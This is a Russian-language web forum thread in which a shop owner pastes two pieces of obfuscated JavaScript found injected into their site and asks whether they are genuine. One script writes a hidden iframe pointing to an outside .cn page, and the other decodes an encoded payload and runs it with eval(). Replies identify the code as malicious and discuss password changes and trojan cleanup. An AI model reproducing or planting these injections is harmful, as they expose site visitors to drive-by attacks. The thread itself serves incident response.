Категории

Вирусы на сайте

Уважаемые)))

подскажите в чем проблема))
при попытке зайти на сайт антивирь начинает ругаться на Exploit web attaker.

при проверки кода на вирусы нашел несколько подозрительных моментов.

<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+'<ifr'+unescape('%61%6D%65%20')+unescape('%69%64%3D')+unescape('%22%36')+String.fromCharCode(98)+String.fromCharCode(101)+String.fromCharCode(100)+''+unescape('%62%33')+unescape('%64%62%37')+'e'+'6a9f'+String.fromCharCode(49)+String.fromCharCode(98)+String.fromCharCode(101)+String.fromCharCode(53)+''+'7d0'+String.fromCharCode(48)+String.fromCharCode(100)+String.fromCharCode(97)+String.fromCharCode(102)+''+unescape('%37%33%33')+unescape('%31%66%36%30')+'" '+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(109)+''+String.fromCharCode(101)+''+'="96'+'24'+unescape('%38%36')+unescape('%61%35%36%61')+unescape('%39%66%38')+unescape('%61')+unescape('%37%30%30')+unescape('%66%37')+unescape('%64%36')+unescape('%35%34%62')+unescape('%30%62%32%32')+String.fromCharCode(99)+''+unescape('%63%33%39')+'"'+' w'+'idth'+String.fromCharCode(61)+String.fromCharCode(49)+String.fromCharCode(32)+''+String.fromCharCode(104)+''+unescape('%65%69')+unescape('%67%68%74')+String.fromCharCode(61)+String.fromCharCode(49)+String.fromCharCode(32)+String.fromCharCode(102)+''+String.fromCharCode(114)+''+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(98)+''+'ord'+String.fromCharCode(101)+''+'r='+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+''+'c="h'+'tt'+'p:/'+unescape('%2F%62%65%73')+String.fromCharCode(116)+String.fromCharCode(102)+''+String.fromCharCode(105)+''+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(97)+String.fromCharCode(104)+''+unescape('%6F%6D%65%2E')+String.fromCharCode(99)+String.fromCharCode(110)+String.fromCharCode(47)+''+String.fromCharCode(104)+String.fromCharCode(111)+''+unescape('%6D')+String.fromCharCode(101)+String.fromCharCode(46)+''+'htm'+'l"><'+'/'+String.fromCharCode(105)+''+String.fromCharCode(102)+''+unescape('%72%61%6D%65%3E')+'');</SCRIPT>

а так же

<script language=JavaScript> function gb3b23(x) { var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,43,39,58,55,20,5,28,30,44,0,0,0,0,0,0,46,9,23,47,40,27,62,19,14,12,45,21,56,13,18,35,1,52,48,17,15,31,53,25,37,49,8,0,0,0,0,24,0,7,6,50,57,22,59,0,51,33,26,16,42,60,34,3,54,11,61,32,10,4,38,2,36,41,29);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v)<<b;if(b){q+=String.fromCharCode(166^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}gb3b23('S0Icw27QZeJQaqrQKCWsn2Icoa_2w27YGCmRZqMnSGrhNT9OPldhgGrYqT9iZUmcoCWYaB9x8e9iKGzYENDhNqJV7v_n889Rw09QT2IcZvIVP2DQAvWsM@FYNfIn52mQZq9O1U9QHOZVaO9RAC9OTcZXe3Ax8F_OPemY6qy26a_OPNDiS09RNfmv5NAXb3mRTa9hNCd2Nj_VN0JcoCAiw07Ve1mYUhAcAOmRunyvAFIR5UmcoOWsTw') </script>

и еще

скажите это пормальные рабочие скрипты или же сторонние (не ваши).

прошу ответить как можно оперативнее, а то сайт по причине подозрения на вирусы отключен.

бекап, удаляй

меры по устранению уже приняты )))

все работает )))

нормальный только этот кусок

Все остальное вредоносная инъекция )))

))) будьте бдительны, люди )))

так ты лучше смени пароль на фтп, проставь нормальные чмоды и проверь свой комп на виры, так как это одно из двух - или ламанули хостера (но тогда пасс еще расшифровать нада) или стырили у тебя с компа (тогда это вирус)

я же написал, что все уже улажено )))

сперли с меня или еще кого-то пассы (кто имеет доступ к ftp)

по крайней мере у меня точно сидел хитрый троян.

послал всех делать полную проверку компов, а хостера 3-го из списка самых крутых хостингов мира не так-то просто ломануть )))

да и пассы с логинами все изменены в срочном порядке на ООООООчень длинные.

даже если ломанут, то пусть попробуют расшифровать пароль в 20-50 символов )))

да к тому же защиту тоже врубили )))

а какой движок у вас стоит ? случайно не ВамШоп ? его частенько дырявят =)

Выстраиваем логическую цепочку)))

Раз я пишу на этом форуме, просвещенном ShopOS, разумеется, что все касается исключительно этого скрипта.

Конечно же я осведомлен, что вамшоп дырявый причем не мало)))

это один из факторов который заставил отказаться от этого скрипта)))

держите пароли в уме ;)

конечно же в уме)))

правда есть одно "НО".

сложновато будет запомнить пароль такого вида WQy2XnMIPcwnH2
(это просто пример)

а пароли от 20 до 50 символов )))

Усложнение пароля ничего не даст.

Лучше антивирус + заплатки на винду поставить. больше пользы будет

Конечно же я осведомлен, что вамшоп дырявый причем не мало)))

это один из факторов который заставил отказаться от этого скрипта)))

О каких дырявостях идет речь? ... единственный баг у него видел, что можно получить доступ к файлам кеша. и поисковики этот мусор могут проиндексировать.

явных дырок, через которые можно получить доступ к управлению магазином - нет.

винда обновляется постоянно по мере выхода заплаток, и антивирь тоже каждые 12 часов обновляется )))

Если честно . то уже тошнит от винды.
kubuntu хочу поставить, да вот руки никак не доходят.
постоянно озадачивают вещами, которые требуют нынешнюю инфу на винтах.

винда обновляется постоянно по мере выхода заплаток, и антивирь тоже каждые 12 часов обновляется )))

Тоже самое. и что то ниразу проблем с заразой не было.

просто примерно неделю назад небыло никакого антивиря)))

стоял просто firewall.

и я по наивности думал, что с его помощью отслеживаю все процессы )))

после скана оказалось парочка лошадок все таки сидит )))

суть в том что пасы сменил, машину почистил и все гуд

апароли на 20-50 символов, да еще в кракозяблях - это параноя, и как сказал Евгений не сильно то и поможет, если червь или конь остались на компе

держите пароли в уме ;)

кстати тоже не поможет, тебе же всеравно его напечатать прийдется и в этот момент и конь и червь его стырят, отслеживать клаву не так уж и сложно

Источник